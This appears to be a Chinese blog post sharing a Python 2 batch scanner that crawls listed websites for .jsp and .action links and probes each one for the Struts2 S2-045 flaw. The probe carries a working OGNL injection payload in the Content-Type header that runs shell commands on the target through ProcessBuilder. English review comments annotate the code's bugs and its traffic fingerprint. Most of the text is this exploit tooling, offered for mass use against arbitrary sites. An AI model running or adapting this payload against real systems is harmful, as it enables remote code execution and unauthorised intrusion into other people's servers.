
1、概述都懒得写了……

就是批量测试用的，从某个工具里抠出来的 POC，然后根据自己的理解写了个爬网站首页 URL 的代码……


#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests
import random
import httplib
import re
import os
import sys

#########################
##  作者:zzzzzhhhhhhh
##  Code功能
##    1、批量获取指定网站的URL
##    2、批量验证Struts2-045漏洞
##    BUG:121个左右根据网络状况会报错,清除已测试过的网址再测试就没啥问题。懵逼
###########################


# Work-around for ChunkedEncodingError: force HTTP/1.0 on every httplib
# connection so servers do not answer with chunked HTTP/1.1 bodies.
# NOTE(review): this pokes private attributes of the stdlib class and is
# process-wide; presumably it reaches requests through urllib3 — confirm,
# and expect it to break silently on other httplib versions.
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsn_str = \'HTTP/1.0\'

# Module-level accumulators shared by the functions below (never cleared).
http_URL = []      # .jsp/.action links collected by curl_Site_URL, probed by read_file
http_website  = []  # site addresses read from the input file by read_file

# Prefix a bare host with the http:// scheme
def add_http(url):
    """Return ``url`` with ``http://`` prepended unless it already contains it.

    The test is a plain substring check: any string containing ``http://``
    anywhere is returned unchanged, while an ``https://`` address does not
    match and therefore gains a second scheme (``'http://https://host'``).
    """
    scheme = 'http://'
    already_prefixed = scheme in url
    return url if already_prefixed else scheme + url

# Crawl the homepage and collect links ending in .jsp / .action
def curl_Site_URL(url):
    """Fetch the page at ``url`` and append candidate links to ``http_URL``.

    Every ``href`` value (double- or single-quoted) is pulled out with a regex;
    those whose file extension is exactly ``.jsp`` or ``.action`` are appended
    to the module-level ``http_URL`` list. A link that does not contain
    ``http://`` is treated as site-relative and concatenated onto ``url`` with
    no separator, so only hrefs that start with ``/`` join correctly
    (``example.com`` + ``foo.action`` becomes ``http://example.comfoo.action``).
    An href with a query string (``foo.action?x=1``) has extension
    ``.action?x=1`` and is dropped.

    Args:
        url: Site address, with or without ``http://``.

    Returns:
        ``False`` when the GET raises ``requests.RequestException``;
        ``None`` otherwise (results are delivered through ``http_URL``).
    """
    url = add_http(url)
    website = url  # keep the origin so relative paths can be joined onto it
    # No timeout is passed, so a host that accepts the connection but never
    # answers blocks the whole batch (requests waits indefinitely by default).
    try:
        r = requests.get(url)
    except requests.RequestException as e:
        print "error website:"+url
        return False
    data = r.text
    # Regex link extraction: href="..." or href='...'; unquoted hrefs are missed.
    link_list = re.findall(r"(?<=href=\").+?(?=\")|(?<=href=\\').+?(?=\\')", data)
    for url in link_list:  # rebinds the parameter; `website` still holds the base
        filename = os.path.basename(url)  # filename part of the href
        (shotname, extension) = os.path.splitext(filename)  # `shotname` is unused
        if ((extension == ".jsp") or (extension == ".action")):  # extension filter
            if \'http://\' not in url:  # substring test: an https:// link is treated as relative
                url = website + url
                http_URL.append(url)    # collected into the shared list
            else:
                http_URL.append(url)

## 2. Probe one URL for the Struts2 S2-045 vulnerability
def poc(url):
    """Send the S2-045 probe to ``url`` and report whether it responded.

    This is an active check, not a version lookup: the Content-Type header
    carries an OGNL expression that a vulnerable Struts2 server evaluates,
    running an arithmetic shell command (``expr a + b`` or ``set /a a + b``)
    with two random operands and copying its output into the HTTP response.
    The verdict is purely ``str(c) in r.text``, so a page that happens to
    contain the eight-digit sum is a false positive.

    Args:
        url: Target, with or without an ``http://`` prefix (see ``add_http``).

    Returns:
        ``'[S2-045 vul]' + url`` when the sum appears in the response body,
        otherwise ``False``. Never raises: every exception, including
        timeouts and connection errors, is swallowed and reported as ``False``.
    """
    url = add_http(url)
    try:
        # Two random eight-digit operands: the expected sum is unlikely to
        # occur in a normal page by chance.
        a = random.randint(10000000, 20000000)
        b = random.randint(10000000, 20000000)
        c = a + b
        win = \'set /a \' + str(a) + \' + \' + str(b)  # Windows cmd arithmetic
        linux = \'expr \' + str(a) + \' + \' + str(b)  # POSIX shell arithmetic
        header = dict()
        # Fixed desktop User-Agent; together with the Content-Type below it is
        # a stable fingerprint of this tool's traffic for detection purposes.
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        # OGNL expression in Content-Type: chooses the command by os.name,
        # starts it via ProcessBuilder and streams its stdout into the response.
        header["Content-Type"] = "%{(#nike=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#iswin?(#cmd=\'" + win + "\'):(#cmd=\'" + linux + "\')).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        # Empty-body POST with a 5 s timeout.
        r = requests.post(url, headers=header, timeout=5)
        # Positive only if the decimal sum appears anywhere in the body.
        if str(c) in r.text:
            return \'[S2-045 vul]\'+url
        else:
            return False
    except Exception:
        # Swallows everything (timeout, DNS failure, malformed URL), so the
        # caller cannot tell "unreachable" from "not vulnerable".
        return False


# Read the site list and drive the crawl + probe batch
def read_file(file_path):
    """Load site addresses from ``file_path``, crawl each, then probe every URL found.

    Exits the process with status 0 when the path does not exist. Each line,
    stripped of its trailing newline, is appended to ``http_website``; every
    site is crawled with ``curl_Site_URL`` (which fills ``http_URL``) and each
    collected URL is handed to ``poc``, printing only positive results.
    Blank lines are kept and therefore become the bare address ``http://``.
    """
    if not os.path.exists(file_path):
        print 'Please confirm correct filepath !'
        sys.exit(0)
    with open(file_path, 'r') as source:
        http_website.extend(line.rstrip('\r\n').rstrip('\n') for line in source)
    # Crawl every site; each address is echoed first so progress is visible.
    for site in http_website:
        print site
        curl_Site_URL(site)
    # Probe the collected URLs and print the hits.
    for candidate in http_URL:
        verdict = poc(candidate)
        if verdict != False:
            print verdict


if __name__ == \'__main__\':
    # Interactive entry point: prompt for the path of a text file holding one
    # site address per line, then run the whole batch through read_file.
    file_str=raw_input(\'Input file IP.txt filepath eg:D:\\\\test.txt \n\')
    read_file(file_str)
    ## example input path left by the author: C:\\Users\\AT\\Desktop\\domain.txt


txt 里保存网站地址就可以了，爬虫还需要后续学习、优化、添加功能……
